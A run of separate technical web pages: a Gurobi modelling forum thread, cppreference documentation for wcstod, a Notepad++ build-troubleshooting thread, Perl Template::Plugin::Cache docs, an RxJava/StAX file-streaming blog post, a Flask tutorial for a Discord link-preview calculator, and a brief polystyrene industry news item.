        obj = func(_x)
        mdl.setObjective(obj, GRB.MINIMIZE)

The code snippet you provided is not executable and does not lead to the errors you described. That makes it harder to provide help in this case. If you get the "Awaiting Model Update" error, you can execute the update method to make a variable's properties accessible before optimization. Please note that the X attribute is only available if a feasible solution point is available, e.g., through a previous optimization run. You can check whether a solution is available via the SolCount attribute.
Best regards,
Jaromił

The same question has also been posted on StackOverflow: How can I get values of variables awaiting model update in Gurobi python - Stack Overflow

Firstly, I apologize for the insufficient detail in my previous inquiry. The point is value extraction of variables before optimization, which cannot be captured with the X attribute, and it's hard to find examples for the update method.
I present the simple code below, but the real quadratic function represented by cal_module() in the sample is much more complicated. In other words, the quadratic function is the object to be combined like MIP + domain function -> MIQP. Therefore, during the optimizing steps, the decision variables such as x, y need to be converted to numpy or pandas as input for the quadratic formulation included in the objective function. This is why I asked how to get the values of variables, which are uncertain at every model iteration.

---------------------- sample ---------------------------

    import numpy as np
    import gurobipy as gp
    from gurobipy import GRB

    def cal_module(x, y):
        m = np.array([])
        for i in np.arange(len(x) - 1):
            r = x[i]**2 + y[i+1]**3
            m = np.append(m, r)
        return m

    mdl = gp.Model()
    x = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER)
    y = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER)
    mdl.addConstrs(x[t] + y[t] <= 3 for t in range(20))

    pre_x, pre_y = [], []
    for i in range(20):
        pre_x = x[i].value_method  # or any other approach
        pre_y = y[i].value_method  # or any other approach

    obj = gp.quicksum(-2*x[t] + y[t] for t in range(20)) + cal_module(pre_x, pre_y)
    mdl.setObjective(obj, GRB.MINIMIZE)
    mdl.optimize()

If I understand correctly, you are trying to construct a quadratic expression, add it to the objective function, and optimize it. You can and should work with the variable objects directly to achieve this.
The following code should do what you have in mind:

    import gurobipy as gp
    from gurobipy import GRB

    def cal_module(x, y, model):
        qExpr = gp.QuadExpr(0)
        for i in range(len(x) - 1):
            z = model.addVar(lb=0, ub=25, vtype=GRB.INTEGER, name="aux_y_sqr_%d" % (i+1))
            model.addConstr(z == y[i+1]*y[i+1], name="aux_y_sqr_constr_%d" % (i+1))
            qExpr.add(x[i]**2 + y[i+1]*z)
        return qExpr

    mdl = gp.Model()
    x = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER, name="x")
    y = mdl.addVars(20, lb=-5, ub=5, vtype=GRB.INTEGER, name="y")
    mdl.addConstrs(x[t] + y[t] <= 3 for t in range(20))

    obj = gp.quicksum(-2*x[t] + y[t] for t in range(20)) + cal_module(x, y, mdl)
    mdl.setObjective(obj, GRB.MINIMIZE)
    mdl.setParam("NonConvex", 2)
    mdl.write("myLP.lp")
    mdl.optimize()

Note that the variable tupledicts \(\texttt{x,y}\) are directly passed to the \(\texttt{cal_module}\) function. Since Gurobi does not support cubic terms \(y^3\), you have to add an auxiliary variable to model the cubic term as a quadratic and a bilinear term, \(z = y^2\) and \(y\cdot z\), see How do I model multilinear terms in Gurobi? Your model is nonconvex, thus the parameter NonConvex has to be set. I used the write method to write an LP file, which makes it easier to analyze whether the model is indeed a correct one.
Best regards,
Jaromił

Hi Jaromił,
Your comments were really helpful to understand Gurobi's solving flow. Many thanks.
When it comes to the quadratic expression, my problem is actually nonlinear (not quadratic), which represents a physical formulation and seems almost impossible to convert into a model built from Gurobi library variables because of its complexity. As a result, I want to capture some attribute of the variables before they are solved, using the update() method.
The attribute I look for is something like a state of whether the variable contains 0 (zero) or some other value; however, I couldn't find such attributes in the Gurobi documentation. Rephrasing the question: I wonder if I can get to know whether the value of a variable before optimization is zero (0) or not.
Best regards,
Namkyoung Lee

Hi Namkyoung Lee,
If I understand your comment correctly, you are trying to model a conditional statement, i.e., something like if variable \(x=0\) then use constraint \(a\) otherwise use constraint \(b\). Is this correct? If yes, then the article How do I model conditional statements in Gurobi? should be what you are looking for. If not, could you please elaborate a bit further? Maybe provide a small example of what you are trying to model.
Best regards,
Jaromił

Hi Jaromił,
I appreciate your continued help. This is another sample code, which contains an error about an indicator constraint. I am pursuing constructing the formulation with input on whether variables have a value of 0 or a positive integer.
Best regards,
Nam-kyoung

    import numpy as np
    import gurobipy as gp
    from gurobipy import GRB

    def tmp_f(x):
        k = np.array([1 for i in range(10)])
        for j in x:
            k[j] = 0
        return sum((k+1)**2)

    m = gp.Model("qp")
    x = m.addVars(10, lb=0, ub=10, vtype=GRB.INTEGER, name="x")
    y = m.addVars(10, lb=0, ub=10, vtype=GRB.INTEGER, name="y")
    b = m.addVars(10, vtype=GRB.BINARY, name="b")

    # Basic constraints
    m.addConstrs(x[i] + 2 * y[i] <= 21 for i in range(10))
    m.addConstrs(x[i] - y[i] >= 0 for i in range(10))
    m.addConstr(x.sum('*') == 9)

    # big-M approach
    eps = 0.000001
    M = 100 + eps

    # Model if x > 0 then b = 1, otherwise b = 0
    m.addConstrs(x[i] >= eps - M * (1 - b[i]) for i in range(10))
    m.addConstrs(x[i] <= M * b[i] for i in range(10))

    # Indicator constraints
    z = []  # <- initialization of an input for the nonlinear-type formulation
    t = -1
    for i in range(10):
        m.addConstr((b[i] == 1) >> (t == i))
        z.append(t)

    # Objective function
    obj = gp.quicksum(x[i] + y[i] for i in range(10))
    m.setObjective(obj + tmp_f(z), GRB.MAXIMIZE)
    m.optimize()

This thread is continued in Indicator constraint which contains constant value.
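As a plain-Python aside (this is not gurobipy code; it just evaluates the two inequalities numerically), the big-M pair in the sample above can be sanity-checked before handing it to the solver: b = 1 should be admissible exactly when x > 0, and b = 0 exactly when x = 0.

```python
# Numerically check the big-M linking constraints from the sample:
#   x >= eps - M*(1 - b)   and   x <= M*b
eps = 0.000001
M = 100 + eps

def feasible(x, b):
    return x >= eps - M * (1 - b) and x <= M * b

assert feasible(5, 1)          # positive x allows b = 1
assert not feasible(5, 0)      # ...and forbids b = 0 (x <= M*b fails)
assert feasible(0, 0)          # zero x allows b = 0
assert not feasible(0, 1)      # ...and forbids b = 1 (x >= eps fails)
print("big-M linking behaves as intended")
```

Note that with integer x the eps tolerance is safe; with continuous x, values in (0, eps) would still be treated as "zero".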
https://support.gurobi.com/hc/en-us/community/posts/4416886974609-How-can-I-get-values-of-variables-awaiting-model-update-in-Gurobi-python?page=1#community_comment_4417055700497
wcstof, wcstod, wcstold

Interprets a floating-point value in a wide string pointed to by str.

The function discards any whitespace characters until the first non-whitespace character is found. Then it takes as many characters as possible to form a valid floating-point representation and converts them to a floating-point value. A valid floating-point value can be one of the following:

- decimal floating-point expression, consisting of an optional plus or minus sign; a nonempty sequence of decimal digits, optionally containing a decimal-point character (defines the significand); an optional e or E followed by an optional minus or plus sign and a nonempty sequence of decimal digits (defines the exponent)
- hexadecimal floating-point expression, consisting of an optional plus or minus sign; 0x or 0X; a nonempty sequence of hexadecimal digits, optionally containing a decimal-point character (defines the significand); an optional p or P followed by an optional minus or plus sign and a nonempty sequence of decimal digits (defines the exponent)
- infinity expression: an optional plus or minus sign followed by INF or INFINITY, ignoring case
- not-a-number expression: an optional plus or minus sign followed by NAN or NAN(char_sequence), ignoring case of the NAN part. char_sequence can only contain digits, Latin letters, and underscores. The result is a quiet NaN floating-point value.
- any other expression that may be accepted by the currently installed C locale

The function sets the pointer pointed to by str_end to point to the wide character past the last character interpreted. If str_end is NULL, it is ignored.

Return value

Floating-point value corresponding to the contents of str on success. If the converted value falls out of range of the corresponding return type, a range error occurs and HUGE_VAL, HUGE_VALF or HUGE_VALL is returned. If no conversion can be performed, 0 is returned.

Example

    #include <stdio.h>
    #include <errno.h>
    #include <wchar.h>

    int main(void)
    {
        const wchar_t *p = L"111.11 -2.22 0X1.BC70A3D70A3D7P+6 1.18973e+4932zzz";
        printf("Parsing L\"%ls\":\n", p);
        wchar_t *end;
        for (double f = wcstod(p, &end); p != end; f = wcstod(p, &end))
        {
            printf("'%.*ls' -> ", (int)(end - p), p);
            p = end;
            if (errno == ERANGE) {
                printf("range error, got ");
                errno = 0;
            }
            printf("%f\n", f);
        }
    }

Output:

    Parsing L"111.11 -2.22 0X1.BC70A3D70A3D7P+6 1.18973e+4932zzz":
    '111.11' -> 111.110000
    ' -2.22' -> -2.220000
    ' 0X1.BC70A3D70A3D7P+6' -> 111.110000
    ' 1.18973e+4932' -> range error, got inf

© cppreference.com
Licensed under the Creative Commons Attribution-ShareAlike Unported License v3.0.
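As an aside, the hexadecimal significand/exponent form in the example above is not C-specific. Python's float.fromhex accepts the same notation, which gives a quick cross-check (in Python, not part of the C reference) that 0X1.BC70A3D70A3D7P+6 is exactly the double nearest 111.11:

```python
# Python aside: float.fromhex parses the same 0x...p+N hexadecimal
# floating-point notation that wcstod accepts after the 0x/0X prefix.

v = float.fromhex("0x1.BC70A3D70A3D7p+6")
assert v == 111.11                                  # exactly the double nearest 111.11
assert float.fromhex(float.hex(111.11)) == 111.11   # hex form round-trips

# The INF/INFINITY spellings also have float() counterparts,
# matched case-insensitively, just like in wcstod.
assert float("INFINITY") == float("inf")
print(v)
```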
https://docs.w3cub.com/c/string/wide/wcstof/
Multiple errors building NPP 7.5.6

Hello,
Building NPP 7.5.6 with VS Community 2013 results in multiple errors. And many more. The last version I built successfully was NPP 7.5.
I'd appreciate your help.

Hi Yaron,
long time no see - how are you doing, hopefully fine.
According to MS, those should be available in <sys\stat.h>. Maybe you need to include this in VS 2013 CE explicitly.
Cheers
Claudia

- Vitaliy Dovgan
That must be my fault - I compiled Notepad++ only in VS 2015, did not try the 2013 one. The additional #include <sys/stat.h> should fix it indeed.

Hello Claudia,
It's always a pleasure to communicate with you. I'm fine, thank you. I hope you are as well.
Adding #include <sys/stat.h> to Common.cpp has indeed solved the errors appearing in the screenshot above. I'm still getting these errors. Could you please enlighten me as to how you found <sys/stat.h>? Did you search _S_IREAD?
Thank you for your kind help. I do appreciate it.

Hello Vitaliy,
Thank you for your reply too. Appreciated.
Best regards.

thx, I'm fine.
Yes, actually I was searching for _S_IREAD and _S_IEXEC, and if it is development related I always add msdn to the search to get the MS results first.
But it looks like there is something else missing in addition. Let's see what the git log says about changes.
'Till then …
Cheers
Claudia

the new version uses keywords like noexcept which aren't available for VS versions < 2015, so we either could try to hack around by defining macros, changing source code etc… or you need to update to a newer VS.
Btw. I'm really impressed by VS2017, which works very well even on my old pc running in a virtual machine.
Cheers
Claudia

- Vitaliy Dovgan
VS 2013 does not completely comply even with C++11, not to mention C++14, so a newer version of VS is recommended.
It may be strange to hear such words from a person who wants Notepad++ to be compatible with Windows XP and who was still using VS 2005 (together with VS 2013, though) just a year or two ago, but:

- VS 2015 and VS 2017 do support Windows XP targeting and
- the newer the VS version used, the more of the latest C++ features are available to the developers.

Taking this into account, as well as the availability of free Community or Express versions of the latest VS, there is not much sense in staying on VS 2013 - plus, VS 2013 and VS 2015 or newer can co-exist under the very same system, if there is a need to still have VS 2013.

Hello Claudia,
Thanks again for looking into it and solving the problem. I do appreciate it.
I understand I should be able to build NPP with VS 2017 (using notepadPlus.vcxproj and not notepadPlus.vs2013.vcxproj), correct?
VS installation is quite mammoth. :) How would you handle it? Completely uninstalling VS 2013 (assuming I don't need it)?

Hello Vitaliy,
Thank you for the additional info. I appreciate that.
Best regards.

Hi Yaron,
if you don't need VS2013 anymore, why waste GBs of space - remove it. But as Vitaliy stated, both can coexist, just in case you still need it.
Unfortunately VS2017 forces you to have a Windows account, otherwise you can't unlock the test version. And yes, the vcxproj is the one I used as well.
Cheers
Claudia

Hello Claudia,
Thanks again for your kind help. Appreciated as always.
Best regards.

Hello Claudia and Vitaliy,
Last week I installed VS 2017 Community and built NPP 7.5.6. Thanks again for your help.
I tried today to check Preferences -> General -> Document List Panel - Show and NPP crashed.
Thinking it was due to some of my code changes, I downloaded the repository again and built it as is. The same result - NPP crashes.
Building: I double-clicked notepadPlus.vcxproj, was prompted to add support for XP, and built the solution.
Using the original binary included in the official packages, the crash does not occur.
Any idea?
Best regards.

as I did - but no crashes so far
and is this reproducible?
Which VS version do you run?

Microsoft Visual Studio Community 2017
Version 15.6.3
VisualStudio.15.Release/15.6.3+27428.2011
Microsoft .NET Framework Version 4.7.02558
Installed Version: Community

Did you change something in the build process? Build events?
How do you start npp? From within the build directory?
x64 or x32? (I tested only x64)
Cheers
Claudia

Hello Claudia,
Thank you very much for the prompt reply. I do appreciate it.
The only things I modified were from x64 to x86 and to Release instead of Debug. No errors or warnings.
I've used it for a few days without any problem. Trying today to display the Document List Panel, the crash happened. It is consistent; whenever I try to check that option NPP crashes.
I downloaded a fresh portable NPP and replaced the binary with my build.
Best regards.

Yaron,
just did an x86 release build and it looks ok - I guess you assumed that this is the case.
From the code I could only guess that there might be a problem with your configuration files.
If you have downloaded an official zipped package, could you replace the officially built npp exe with the one you built and run it within this directory? If this works, then it indicates that one of your configuration files is corrupt.
If it doesn't work … hmmm … which operating system do you run?
Cheers
Claudia

Hello Claudia,
Thanks again for your time and effort.

"If you have downloaded an official zipped package, could you replace the officially built npp exe with the one you built and run it within this directory?"

That is just what I have done. :)
Win 7 x32.
Best regards.

I thought you did it the other way - that you copied the official exe to your directory - but I meant copying your exe to the official unzipped directory, so that your exe runs with the official configuration files. Or did you already check both ways?
Cheers
Claudia

Both ways. Thanks again. Appreciated.
Yaron , then I would say time to debug. Either run from within VS (copy everything to the build directory) or attach it to the running exe, but then make sure the pdb files are found. Just for info - I have to stay up early tomorrow so I have to stop here. But if there is anything I could do we can follow up tomorrow night :-) Cheers Claudia Hello Claudia, I’ve never used the Debugger. :) It might also be some general setting I’ve modified in VS. We’ll see tomorrow. Thanks again and good night. Hello Claudia, I’ve created a Dump file, opened it in VS and used “Debug with Native Only”. Interestingly, if I check Hide Extension Columnfirst and then Show- the crash does not happen. Whenever you have some free time. Thanks again. Best regards. Hi Yaron, can you set a breakpoint onto line 100 in VerticalFileSwitchesListView.cpp like here run the project by pressing F5, once npp appears do the setting changes and then when VS comes up with the breakpoint step through it with F10 until you receive the access denied exception, then we know which part exactly throws that exception. Cheers Claudia
https://notepad-plus-plus.org/community/topic/15438/multiple-errors-building-npp-7-5-6
Template::Plugin::Cache - cache output of templates

  [% USE cache = Cache %]
  [% cache.inc(
         'template' => 'slow.html',
         'keys' => {'user.name' => user.name},
         'ttl' => 360
     ) %]

  # or with a pre-defined Cache::* object and key
  [% USE cache = Cache( cache => mycache ) %]
  [% cache.inc(
         'template' => 'slow.html',
         'key' => mykey,
         'ttl' => 360
     ) %]

The Cache plugin allows you to cache generated output from a template. You load the plugin with the standard syntax:

  [% USE cache = Cache %]

This creates a plugin object with the name 'cache'. You may also specify parameters for the default Cache module (Cache::FileCache), which is used for storage.

  [% USE mycache = Cache(namespace => 'MyCache') %]

Or use your own Cache object:

  [% USE mycache = Cache(cache => mycacheobj) %]

The only methods currently available are include and process, abbreviated to "inc" and "proc" to avoid clashing with built-in directives. They work the same as the standard INCLUDE and PROCESS directives, except that they will first look for cached output from the template being requested and, if they find it, they will use that instead of actually running the template.

  [% cache.inc(
         'template' => 'slow.html',
         'keys' => {'user.name' => user.name},
         'ttl' => 360
     ) %]

The template parameter names the file or block to include. The keys are variables used to identify the correct cache file. Different values for the specified keys will result in different cache files. The ttl parameter specifies the "time to live" for this cache file, in seconds.

Why the ugliness on the keys? Well, the TT dot notation can only be resolved correctly by the TT parser at compile time. It's easy to look up simple variable names in the stash, but compound names like "user.name" are hard to resolve at runtime. I may attempt to fake this in a future version, but it would be hacky and might cause problems.
You may also use your own key value:

  [% cache.inc(
         'template' => 'slow.html',
         'key' => yourkey,
         'ttl' => 360
     ) %]

How is this different from the caching Template Toolkit already does? That cache is for caching the template files and the compiled version of the templates. This cache is for caching the actual output from running a template. There are two situations where this might be useful. The first is if you are using a plugin or object inside your template that does something slow, like accessing a database or a disk drive or another process - the DBI plugin, for example. I don't build my apps this way (I use a pipeline model with all the data collected before the template is run), but I know some people do. The other situation is if you have an unusually complex template that takes a significant amount of time to run. Template Toolkit is quite fast, so it's uncommon for the actual template processing to take any noticeable amount of time, but it is possible in extreme cases.

Why Cache::FileCache as the default? Because Cache::FileCache is by far the fastest in nearly all cases.

Could other Cache modules be supported? I could, if there is a demand for it.

If you have a template that produces side effects when run, like modifying a database or object, these side effects will not be captured and caching will break them. The cache only caches actual template output. Of course, if you have a template which produces side effects, you are a very naughty person and you get what you deserve.

Perrin Harkins (perrin@elem.com) wrote the first version of this plugin, with help and suggestions from various parties. Peter Karman (peter@peknet.com) provided a patch to accept an existing cache object.

This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself.

Template::Plugin, Cache::FileCache
http://search.cpan.org/dist/Template-Plugin-Cache/Cache.pm
Processing a file as a stream turns out to be tremendously effective and convenient. In this post we will eventually implement parsing and streaming of a possibly very large XML file using StAX and RxJava. But first: many people seem to forget that since Java 8 (3+ years!) we can very easily turn any file into a stream of lines:

String filePath = "foobar.txt";
try (BufferedReader reader = new BufferedReader(new FileReader(filePath))) {
    reader.lines()
            .filter(line -> !line.startsWith("#"))
            .map(String::toLowerCase)
            .flatMap(line -> Stream.of(line.split(" ")))
            .forEach(System.out::println);
}

reader.lines() returns a Stream<String> which you can further transform. In this example, we discard lines starting with "#" and explode each line by splitting it into words. This way we achieve a stream of words as opposed to a stream of lines. Working with text files is almost as simple as working with normal Java collections. In RxJava we already learned about the generate() operator. It can be used here as well to create a robust stream of lines from a file:

Flowable<String> file = Flowable.generate(
        () -> new BufferedReader(new FileReader(filePath)),
        (reader, emitter) -> {
            final String line = reader.readLine();
            if (line != null) {
                emitter.onNext(line);
            } else {
                emitter.onComplete();
            }
        },
        reader -> reader.close()
);

The generate() operator in the aforementioned example is a little bit more complex. The first argument is a state factory. Every time someone subscribes to this stream, the factory is invoked and a stateful BufferedReader is created.
Then, when downstream operators or subscribers wish to receive some data, the second lambda (with two parameters) is invoked. This lambda expression tries to pull exactly one line from the file and either sends it downstream (onNext()) or completes when end of file is encountered. It's fairly straightforward. The third, optional argument to generate() is a lambda expression that can do some cleanup with the state. It's very convenient in our case, as we have to close the file not only when end of file is reached but also when consumers prematurely unsubscribe.

Meet the Flowable.using() operator

This seems like a lot of work, especially when we already have a stream of lines from JDK 8. Turns out there is a similar factory operator named using() that is quite handy. First of all, the simplest way of translating a Stream from Java to a Flowable is by converting the Stream to an Iterator (checked exception handling ignored):

Flowable.fromIterable(new Iterable<String>() {
    @Override
    public Iterator<String> iterator() {
        final BufferedReader reader = new BufferedReader(new FileReader(filePath));
        final Stream<String> lines = reader.lines();
        return lines.iterator();
    }
});

This can be simplified to:

Flowable.<String>fromIterable(() -> {
    final BufferedReader reader = new BufferedReader(new FileReader(filePath));
    final Stream<String> lines = reader.lines();
    return lines.iterator();
});

But we forgot about closing the BufferedReader, thus the FileReader, thus the file handle. So we introduced a resource leak. Under such circumstances the using() operator works like a charm. In a way it's similar to the try-with-resources statement. You can create a stream based on some external resource.
The lifecycle of this resource (creation and disposal) will be managed for you when someone subscribes or unsubscribes:

Flowable.using(
        () -> new BufferedReader(new FileReader(filePath)),
        reader -> Flowable.fromIterable(() -> reader.lines().iterator()),
        reader -> reader.close()
);

It's fairly similar to the last generate() example; however, the most important lambda expression, the one in the middle, is quite different. We get a resource (reader) as an argument and are supposed to return a Flowable (not a single element). This lambda is called only once, not every time the downstream requests a new item. What the using() operator gives us is managing the BufferedReader's lifecycle. using() is useful when we have a piece of state (just like with generate()) that is capable of producing the whole Flowable at once, as opposed to one item at a time.

Streaming XML files... or JSON, for that matter

Imagine you have a very large XML file that consists of the following entries, hundreds of thousands of them:

<trkpt lat="52.23453" lon="21.01685">
    <ele>116</ele>
</trkpt>
<trkpt lat="52.23405" lon="21.01711">
    <ele>116</ele>
</trkpt>
<trkpt lat="52.23397" lon="21.0166">
    <ele>116</ele>
</trkpt>

This is a snippet from the standard GPS Exchange Format that can describe geographical routes of arbitrary length. Each <trkpt> is a single point with latitude, longitude and elevation. We would like to have a stream of track points (ignoring elevation for simplicity) so that the file can be consumed partially, as opposed to loading everything at once. We have three choices:

- DOM/JAXB - everything must be loaded into memory and mapped to Java objects. Won't work for infinitely long files (or even very large ones)
- SAX - a push-based library that invokes callbacks whenever it discovers an XML tag opening or closing.
Seems a bit better, but can't possibly support backpressure - it's the library that decides when to invoke callbacks and there is no way of slowing it down
- StAX - like SAX, but we must actively pull data from the XML file. This is essential to support backpressure - we decide when to read the next chunk of data

The parser is called XMLStreamReader and is created with the following sequence of spells and curses:

XMLStreamReader staxReader(String name) throws XMLStreamException {
    final InputStream inputStream = new BufferedInputStream(new FileInputStream(name));
    return XMLInputFactory.newInstance().createXMLStreamReader(inputStream);
}

Just close your eyes and make sure you always have a place to copy-paste the snippet above from. It gets even worse. In order to read the first <trkpt> tag, including its attributes, we must write quite some complex code:

import lombok.Value;

@Value
class Trackpoint {
    private final BigDecimal lat;
    private final BigDecimal lon;
}

Trackpoint nextTrackpoint(XMLStreamReader r) {
    while (r.hasNext()) {
        int event = r.next();
        switch (event) {
            case XMLStreamConstants.START_ELEMENT:
                if (r.getLocalName().equals("trkpt")) {
                    return parseTrackpoint(r);
                }
                break;
            case XMLStreamConstants.END_ELEMENT:
                if (r.getLocalName().equals("gpx")) {
                    return null;
                }
                break;
        }
    }
    return null;
}

Trackpoint parseTrackpoint(XMLStreamReader r) {
    return new Trackpoint(
            new BigDecimal(r.getAttributeValue("", "lat")),
            new BigDecimal(r.getAttributeValue("", "lon"))
    );
}

The API is quite low-level and almost adorably antique. Everything happens in a gigantic loop that reads... something of type int. This int can be START_ELEMENT, END_ELEMENT or a few other things which we are not interested in. Remember we are reading an XML file, but not line-by-line or char-by-char - we read logical XML tokens (tags). So, if we discover the opening of a <trkpt> element we parse it, otherwise we continue. The second important condition is when we find the closing </gpx>, which should be the last thing in a GPX file.
We return null in such a case, signaling end-of-XML-file.

Feels complex? This is actually the simplest way to read large XML with constant memory usage, irrespective of file size. How does all of this relate to RxJava? At this point we can very easily build a Flowable<Trackpoint>. Yes, Flowable, not Observable (see: Flowable vs. Observable). Such a stream will have full support for backpressure, meaning it will read the file at an appropriate speed:

Flowable<Trackpoint> trackpoints = generate(
        () -> staxReader("track.gpx"),
        this::pushNextTrackpoint,
        XMLStreamReader::close);

void pushNextTrackpoint(XMLStreamReader reader, Emitter<Trackpoint> emitter) {
    final Trackpoint trkpt = nextTrackpoint(reader);
    if (trkpt != null) {
        emitter.onNext(trkpt);
    } else {
        emitter.onComplete();
    }
}

Wow, so simple, such backpressure! [1] We first create an XMLStreamReader and make sure it's being closed when the file ends or someone unsubscribes. Remember that each subscriber will open and start parsing the same file over and over again. The lambda expression in the middle simply takes the state variable (XMLStreamReader) and emits one more trackpoint. All of this seems quite obscure, and it is! But we now have a backpressure-aware stream taken from a possibly very large file, using very little resources. We can process trackpoints concurrently or combine them with other sources of data. In the next article we will learn how to load JSON in a very similar way.

Nice post - thanks for sharing.

Tomasz, thank you for writing these articles, they're very helpful, clear and useful in a world where good RxJava documentation is scarce. Please keep writing them.

Thank you, three more articles are ready and waiting to be published :-)

Hello, is there any GitHub repo we can download to check this out? Great article, thanks!

Source code is only available in this article, but the snippets should be almost self-sufficient.
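As a footnote to the StAX section above: the pull parser needs nothing beyond the JDK (javax.xml.stream). Here is a minimal, dependency-free sketch - no RxJava, no Lombok, and with names of my own (StaxDemo, parseFirstTrackpoint) rather than the article's - that pulls events from an in-memory GPX fragment until the first <trkpt>, just to show the pull-based API in isolation:

```java
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamReader;
import java.io.StringReader;

public class StaxDemo {

    // Pulls events until the first <trkpt> start tag and returns "lat,lon".
    // Returns null when the document ends without any <trkpt>.
    static String parseFirstTrackpoint(String xml) throws Exception {
        XMLStreamReader r = XMLInputFactory.newInstance()
                .createXMLStreamReader(new StringReader(xml));
        try {
            while (r.hasNext()) {
                int event = r.next();  // we decide when to read the next token
                if (event == XMLStreamConstants.START_ELEMENT
                        && r.getLocalName().equals("trkpt")) {
                    return r.getAttributeValue(null, "lat")
                            + "," + r.getAttributeValue(null, "lon");
                }
            }
            return null;
        } finally {
            r.close();  // always release the underlying reader
        }
    }

    public static void main(String[] args) throws Exception {
        String gpx = "<gpx><trkpt lat=\"52.23453\" lon=\"21.01685\">"
                + "<ele>116</ele></trkpt></gpx>";
        System.out.println(parseFirstTrackpoint(gpx));
    }
}
```

Because the loop advances only when we call next(), wrapping this in Flowable.generate(), as the article does, gives each downstream request exactly one unit of parsing work.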
https://www.nurkiewicz.com/2017/08/loading-files-with-backpressure-rxjava.html
Hello there! I just posted to the Share board, explaining my concept of a "discord bot that isn't a bot". Essentially, it's a website which exploits the way discord shows a sort-of preview of some websites when a link to them is posted. The website I made is blank when viewed in a browser, but when a link is posted in discord, it can display whatever content I want, responding to any text after the base URL. For example, if you posted a link ending in 2+2, a box would appear underneath showing 4. The best thing about this is that it can be used by anyone on any server, without inviting any bot. Here's a tutorial on how to make your own.

We're going to be doing this in a Python3 repl, using flask to create a server and website, and WolframAlpha to make an advanced scientific calculator. Firstly, we're going to create our flask server.

import flask
app=flask.Flask("")
app.run("0.0.0.0",8080)

This code is fairly self-explanatory. When you run it, a new window will appear in the top-right corner, with a 404 Not Found error. This is because we haven't yet defined our homepage. After line 2, add the following code:

@app.route("/")
def home():
    return "<h1>Hello World!</h1>"

If you run your code now, a large "Hello World" will display in that top-right panel. However, our finished website will not display any content at all. A key part of this project is OGP, Open Graph Protocol. This is a protocol allowing websites to be displayed as the boxes discord shows, and is also in use on many other sites, like Facebook. Create a folder called templates. Inside it, make a file called index.html, with the following code:

<!DOCTYPE HTML>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta property="og:title" content="">
    <meta property="og:type" content="">
    <meta property="og:url" content="">
    <meta property="og:image" content="">
</head>
</html>

The four meta tags in head are required properties for any page using OGP. However, since this isn't a normal website preview, we're not going to use any of these four.
Underneath them, add <meta property="og:description" content="{{output}}">. The og:description property is the text we're going to be seeing, and {{output}} tells flask that this is a variable we're going to assign a value to. Back in main.py, change the return line of home() to return flask.render_template("index.html",output="Hello World!") and run the code. The top-right panel should now be a blank page. In discord (or any other platform that uses OGP) send a message containing the URL of your server. You should see a box containing the words "Hello World!". flask.render_template is a function that allows us to take a file from the templates folder and render the HTML with the variables inside, and we then assign the variable output.

The next step is to create a WolframAlpha app and get an appid. First, you need to create an account here. When you're signed in, open the dropdown menu in the top-right corner and click My Apps (API). Click "Get an AppID". Enter the name of your app and a description, and click Get AppID. You will then be shown your AppID. In your repl, make a file called .env and put appid=YOUR_APPID in it. Naming the file .env means that nobody else can see your AppID (the app in the photo below has been deactivated). In main.py, add import os and import wolframalpha at the top. Next, after app=flask.Flask(""), add client=wolframalpha.Client(os.getenv("appid")). os.getenv("appid") is how we retrieve the AppID which we stored in .env. Underneath the home() function, add the following code:

@app.route("/<path:calculation>")
def calculate(calculation):
    result=client.query(calculation)
    result=next(result.results).text
    return flask.render_template("index.html",output=result)

The first line of that tells flask that we're creating a new route, which in this case is /<anything>. In <path:calculation>, the <> mean that we're passing on a variable called calculation, and path tells flask that calculation is a path rather than a string, meaning it can include /.
We need this for division. If we just had <calculation>, this function would not be called for /9/3, for example. Lines 3 and 4 are the code for WolframAlpha: result ends up storing the result of our calculation, as a string. Line 5 returns the template index.html with the variable output assigned. You can now run this code and test it in discord by going to https://<replname>.<username>.repl.co/1+2, and after a second or two, a box should appear saying 3. You can also change "Hello World!" in the home() function to "/[calculation]\nCalculates a mathematical expression" to tell people how to use your bot.

When you're creating your own bot, there is one major problem you might run into. If one of your functions doesn't require any variables - for example a timchen() function activated when you link to /timchen that gives you a random picture of timchen - you may find yourself a victim of discord caching. This means that if you post the same link, discord simply uses the previous preview and doesn't bother to check for a new one. Getting round this is easy: simply add a query (for example, ?discordcachingisannoying) at the end of the URL each time. As long as the query is different every time, discord won't recognise it as the same URL and will re-request the preview.

I hope you enjoyed this tutorial and found it useful! If you did, please upvote, and I'll send you some vee freebucks! Oh and one final thing... this bot-but-not-a-bot works on Whatsapp!!

Works pretty much everywhere except twitter. Use Twitter meta tags and it works even there too.

@TheDrone7 I know OGP is used on a lot of sites. I just thought whatsapp was a good one to mention since basically everyone uses it
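To make the two ideas above concrete without spinning up Flask, here is a standard-library-only sketch (the function names render_description and cache_busting_url are mine, not from the tutorial): it substitutes a value into the og:description meta tag the way flask.render_template fills in {{output}}, and it builds a cache-busting query string so discord treats each link as new:

```python
import html
import uuid

# Mimics what the template does for our one variable: substitute the
# calculation result into the og:description meta tag.
TEMPLATE = '<meta property="og:description" content="{output}">'

def render_description(output: str) -> str:
    # html.escape keeps a result containing quotes from breaking the attribute
    return TEMPLATE.format(output=html.escape(output, quote=True))

def cache_busting_url(base_url: str) -> str:
    # A unique query string makes discord treat the link as a brand-new URL,
    # so it re-requests the OGP preview instead of reusing a cached one.
    return f"{base_url}?v={uuid.uuid4().hex}"

if __name__ == "__main__":
    print(render_description("4"))
    print(cache_busting_url("https://example.repl.co/2+2"))
```

The real app does the first step through templates/index.html; the second step is exactly the ?discordcachingisannoying trick, just with a generated value instead of a fixed one.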
https://repl.it/talk/learn/How-to-Make-a-Discord-Bot-That-Isnt-a-Bot/17015
09 November 2006 18:01 [Source: ICIS news]

This was followed by a 40,000 tonnes/year closure of PS capacity by Total in Gonfreville, and the largest closure, that of Nova Innovene's 180,000 tonnes/year plant in the UK, which finally shut down at the end of last month. The latest announcement of a closure came from BASF, which said that its 70,000 tonnes/year high impact polystyrene (HIPS) line would also be shut.

